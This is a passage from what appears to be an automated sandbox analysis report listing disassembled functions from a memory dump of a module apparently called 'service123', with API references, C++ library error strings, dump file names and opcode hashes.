Function 6C9B35F0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 92COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 6C9B3648
memcpy.MSVCRT ref: 6C9B36C1

Part of subcall function 6C9B5340: memcpy.MSVCRT ref: 6C9B53D0

Strings

basic_string::_M_replace_aux, xrefs: 6C9B3670

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID: memcpy$memset
String ID: basic_string::_M_replace_aux
API String ID: 438689982-2536181960
Opcode ID: 2cc4f4e13759d9ee26a870d55da195926fed2af00388b8fca4dd49dca8fa5069
Instruction ID: e47f068944bdd7e6f2ac1e525537c65d69b3d2bbb5afb8195f8009a38b0cb482
Opcode Fuzzy Hash: 2cc4f4e13759d9ee26a870d55da195926fed2af00388b8fca4dd49dca8fa5069
Instruction Fuzzy Hash: 75215E76A0A3159FC300AF2CD88046FFBE4FB95668F95496EE88897711D331D854CB92

Function 6C96A790 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 6C96A7AD
wcslen.MSVCRT ref: 6C96A7FD

Strings

basic_string: construction from null is not valid, xrefs: 6C96A7D0, 6C96A820

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID: wcslen
String ID: basic_string: construction from null is not valid
API String ID: 4088430540-2991274800
Opcode ID: 6c46e3097d1f67cba94c2deb63fb97a6ecbe277fe4b4a7887a4d45a162085c1c
Instruction ID: e8a0c0b3ff033ea3a3af4c82e95df715cfcb9f4ef28c07512cb6e83685785c7b
Opcode Fuzzy Hash: 6c46e3097d1f67cba94c2deb63fb97a6ecbe277fe4b4a7887a4d45a162085c1c
Instruction Fuzzy Hash: 3C1190B1D152248BCB01AF6CD5808AABBF4AF65214F02086DE8C89B711D731D999CB92

Function 6C96A3A0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 6C96A3BD
wcslen.MSVCRT ref: 6C96A40D

Strings

basic_string: construction from null is not valid, xrefs: 6C96A3E0, 6C96A430

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID: wcslen
String ID: basic_string: construction from null is not valid
API String ID: 4088430540-2991274800
Opcode ID: 6c46e3097d1f67cba94c2deb63fb97a6ecbe277fe4b4a7887a4d45a162085c1c
Instruction ID: 84133be06eee61cea3e4b466052f7b7264d6e51dcf780d3d053ee124bce863d3
Opcode Fuzzy Hash: 6c46e3097d1f67cba94c2deb63fb97a6ecbe277fe4b4a7887a4d45a162085c1c
Instruction Fuzzy Hash: 211190B19152248BCB01AF6CC5808AABBF4BF55214F42086DE8C89B711D731D999CB92

Function 6C9796A0 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 1123COMMON

Download Yara Rule

Strings

-, xrefs: 6C97A0BE

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: 1aa94c676b9280c08fdce44eed708947e5c09d072c1a18b101ecf0e1c197ab6d
Instruction ID: 33e2495d29284d420bb6b21e55f0434375b3d08f5d26acd93a88f24846c633cd
Opcode Fuzzy Hash: 1aa94c676b9280c08fdce44eed708947e5c09d072c1a18b101ecf0e1c197ab6d
Instruction Fuzzy Hash: D9A28C70A0A2558FDF20CF69C48479DBBF2FF46324F298658D869AB692D730DC45CB60

Function 6C978570 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 1122COMMON

Download Yara Rule

Strings

-, xrefs: 6C978F8E

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: e211fe70ed2b04a9345f7c6428430741590904046f9767a9dc1f9220c44ccd8e
Instruction ID: 8a60d06cbdd58dcd0df25ee684be38a60674ca56df5c2e3a57488a192d4d2338
Opcode Fuzzy Hash: e211fe70ed2b04a9345f7c6428430741590904046f9767a9dc1f9220c44ccd8e
Instruction Fuzzy Hash: 8CA2BF70A063558FDB24CF68C48479DBBF2BF46324F298659D869AF692D330DC45CB60

Function 6C9B3440 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 49COMMON

Download Yara Rule

Strings

basic_string::_S_construct null not valid, xrefs: 6C9B34C0

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID:
String ID: basic_string::_S_construct null not valid
API String ID: 0-290684606
Opcode ID: 998d585115c94e3c0964badf01757eb1ca1abe9c88eff03ea272adc2ad65aff9
Instruction ID: 24552c1c7cd8311c58f3a291ca30b378ee925388662370c9d9010453f64c1fcf
Opcode Fuzzy Hash: 998d585115c94e3c0964badf01757eb1ca1abe9c88eff03ea272adc2ad65aff9
Instruction Fuzzy Hash: EF017CB1509354ABC302AF6EC08462BFFE9BFA1358F95886DE4C857B11CB35D448CB62

Function 6C96A720 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 6C96A73D

Strings

basic_string: construction from null is not valid, xrefs: 6C96A760

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID: wcslen
String ID: basic_string: construction from null is not valid
API String ID: 4088430540-2991274800
Opcode ID: 63a553a9620aea9f92c4c5ba4717aa9c1699c1583f972cc97f17951ee3bf7496
Instruction ID: 063c0a02be0963e48ac80430ec7e2ebc0a8e734b7a2678a3971914883a0506fb
Opcode Fuzzy Hash: 63a553a9620aea9f92c4c5ba4717aa9c1699c1583f972cc97f17951ee3bf7496
Instruction Fuzzy Hash: 6EF05EB1D153248FCB00EF6CC58085AB7F4BF65714F4648ADE8849B711D732E999CB92

Function 6C96A330 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 6C96A34D

Strings

basic_string: construction from null is not valid, xrefs: 6C96A370

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID: wcslen
String ID: basic_string: construction from null is not valid
API String ID: 4088430540-2991274800
Opcode ID: 63a553a9620aea9f92c4c5ba4717aa9c1699c1583f972cc97f17951ee3bf7496
Instruction ID: 5ad783632143c1d8b7a41e14408c40d147380da1263c709aed49a244d434d2ad
Opcode Fuzzy Hash: 63a553a9620aea9f92c4c5ba4717aa9c1699c1583f972cc97f17951ee3bf7496
Instruction Fuzzy Hash: D8F05EB19152248FCB00EF6CC48085AB7F4BF66314B4648ADE8849B711E732ED99CB92

Function 6C9604F0 Relevance: 2.5, Strings: 2, Instructions: 42COMMON

Download Yara Rule

Strings

%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 6C960550
basic_string::substr, xrefs: 6C960548

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID:
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::substr
API String ID: 0-3532027576
Opcode ID: 2ad34994db4801017a9b8f5cfe803fea8fea741c2e971a39c4af428f255203ff
Instruction ID: 97fb174f4b29418881a8c6ee67cfb299f048b367df4c20564f368809d084067f
Opcode Fuzzy Hash: 2ad34994db4801017a9b8f5cfe803fea8fea741c2e971a39c4af428f255203ff
Instruction Fuzzy Hash: 66014B7260A3409FD704DF29D88169BFBE1BBC9754F10996DE488D7700C234D8858B47

Function 6C96C2C0 Relevance: 2.5, Strings: 2, Instructions: 42COMMON

Download Yara Rule

Strings

basic_string::substr, xrefs: 6C96C318
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 6C96C320

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID:
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::substr
API String ID: 0-3532027576
Opcode ID: 0ffb491676ff9c0baedcebcb90b268e9fc7af79eed2fca2e027c581fc6e06208
Instruction ID: 19fb37d196f0062ca005ce2e5ef266da6c7b0a26ec47a6b014ed7267a1ca7c79
Opcode Fuzzy Hash: 0ffb491676ff9c0baedcebcb90b268e9fc7af79eed2fca2e027c581fc6e06208
Instruction Fuzzy Hash: 4D017C716082108BCB04EF2DD48092AFBE1BFDA308F54896DE488D7710D631D949CB86

Function 6C984490 Relevance: 2.1, APIs: 1, Instructions: 873COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 363f04af9199cc8b4c2e67f1e4cd28a30324b732a66133b939d94df60638e8f1
Instruction ID: 33d00a503a81057be2f27ce528829c87e81e96311c456647b2df4c9a772fc086
Opcode Fuzzy Hash: 363f04af9199cc8b4c2e67f1e4cd28a30324b732a66133b939d94df60638e8f1
Instruction Fuzzy Hash: 8282BE71E062988FDB10CFA8C0A079DBBF9AF45314F298A59E865AF795D334D845CF40

Function 6C982A7E Relevance: 2.1, APIs: 1, Instructions: 811COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 362267c1603e07f39893bd52b04f7f32ff825d5483274a477cd50d7e84f34fed
Instruction ID: c27692794691039463df79bdb630c534ae2cbb0e828018051b06df99202cc40d
Opcode Fuzzy Hash: 362267c1603e07f39893bd52b04f7f32ff825d5483274a477cd50d7e84f34fed
Instruction Fuzzy Hash: EB729D70A0A699CFDB11CFB8C48479DBBF1BF0A324F188A59D4A5ABB91D334D845CB41

Function 6C9811BE Relevance: 2.1, APIs: 1, Instructions: 811COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61948244390ce7308088fd9c0d1a03792b644956b963fb0dbbe6630a75b96d2c
Instruction ID: 4a083f87d69fc4a8ac2dfa81a2f010a5d992ff5cbd8924d3c39679e7b954c69f
Opcode Fuzzy Hash: 61948244390ce7308088fd9c0d1a03792b644956b963fb0dbbe6630a75b96d2c
Instruction Fuzzy Hash: 11728C70E0A298CFDB10CFA8C48479DBBF1BF06314F288A59D4A5ABB95D335E845CB41

Function 6C981E40 Relevance: 2.0, APIs: 1, Instructions: 790COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de7ac0bf10222db9c61dddb3229b0952a99835bab8a450f2401c949f0647714d
Instruction ID: 7abfe00901e80bdc90b2397162a560c9a5d80d7b34d4a27d0d3f70c2950dd97b
Opcode Fuzzy Hash: de7ac0bf10222db9c61dddb3229b0952a99835bab8a450f2401c949f0647714d
Instruction Fuzzy Hash: E5728C70E0A799CFDB11CFA8C48879DBBF1AF06314F248A59D4A5ABB81C334E845CB51

Function 6C980580 Relevance: 2.0, APIs: 1, Instructions: 789COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8243783a832a8aecc20a03a5f7bb1cfb1ef0b926f496d64f1a0078d784057c74
Instruction ID: 47be0d5346fe0cfe12626eb6ac4486a2b3b523fe5f0d0e60b7086517c1fa2deb
Opcode Fuzzy Hash: 8243783a832a8aecc20a03a5f7bb1cfb1ef0b926f496d64f1a0078d784057c74
Instruction Fuzzy Hash: 59726870E0B299CFDB10CFA8C49479DBBF1AF06314F288A59D4A5AB791C735E845CB41

Function 6C96F510 Relevance: 2.0, APIs: 1, Instructions: 770stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C96F663

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: 02536fe0dc21b9028167fedf7d8b1be13a2a62232735f22815451683cd99e0c3
Instruction ID: cb1708c23be1b28f73ee0a3664eb9b18a2e6f7996fd112157db5260c36203d26
Opcode Fuzzy Hash: 02536fe0dc21b9028167fedf7d8b1be13a2a62232735f22815451683cd99e0c3
Instruction Fuzzy Hash: 12726D74E042588FDB04CFA9C0806ADBBF2BF49318F288699E465A7BA1D735EC45CF51

Function 6C9877D0 Relevance: 1.9, APIs: 1, Instructions: 678COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef6805500ca01c2f16fae176294d5e7c5f7ab7c2b3d869d9ef60e3b48b4bd2c2
Instruction ID: 81b7435c0b376a27d4c2430d3969303d53423bc96c3a83862b4bde5a5597981f
Opcode Fuzzy Hash: ef6805500ca01c2f16fae176294d5e7c5f7ab7c2b3d869d9ef60e3b48b4bd2c2
Instruction Fuzzy Hash: 4A52D070A062489FDB00CF68C4C479DBFF1AF06328F288A5AF864AB791D735D945CB51

Function 6C972110 Relevance: 1.6, APIs: 1, Instructions: 357COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff6372ef0a9251d138f0073624f0ea2ae09fccbdc705b561bfa349615f81e9fa
Instruction ID: 974f806be082bd11055ed4107b0ecbacea74f40508fc30e9f2a27d1ff07b95b3
Opcode Fuzzy Hash: ff6372ef0a9251d138f0073624f0ea2ae09fccbdc705b561bfa349615f81e9fa
Instruction Fuzzy Hash: 8AE17835E06699CFCB20CFA8C48469DBBF2BF49314F188269E465AB791D334ED41CB60

Function 6C99DA20 Relevance: 1.6, APIs: 1, Instructions: 328COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ddce1dec344faf4ac185e2707990aaa8d0d8670dbd329984dcfd35d468b9a667
Instruction ID: c4436b9fc14eaf0041e9bf2370996b36db1c38b4b3ab96bac8320e81ba24dcaa
Opcode Fuzzy Hash: ddce1dec344faf4ac185e2707990aaa8d0d8670dbd329984dcfd35d468b9a667
Instruction Fuzzy Hash: E2D15F76A052598FCB00CFA8C4C06DDBBF1BF4A324F588265E865AB791D335E945CBA0

Function 6C999910 Relevance: 1.3, Strings: 1, Instructions: 81COMMON

Download Yara Rule

Strings

, xrefs: 6C9999A8

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

